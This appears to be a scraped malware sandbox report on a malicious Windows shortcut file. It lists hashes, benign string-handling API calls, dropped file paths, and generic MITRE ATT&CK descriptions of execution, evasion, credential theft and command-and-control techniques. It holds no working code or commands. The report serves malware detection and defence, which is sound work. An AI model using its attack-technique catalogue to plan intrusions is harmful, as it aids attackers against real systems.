API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report JSWunwO4rS.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k[1].mp4

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\136140\Concerts.com

C:\Users\user\AppData\Local\Temp\136140\d

C:\Users\user\AppData\Local\Temp\Contents

C:\Users\user\AppData\Local\Temp\Courtesy

C:\Users\user\AppData\Local\Temp\Digital

C:\Users\user\AppData\Local\Temp\Dolls

C:\Users\user\AppData\Local\Temp\Envelope

C:\Users\user\AppData\Local\Temp\Envelope.cmd

Windows Analysis Report
JSWunwO4rS.lnk

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre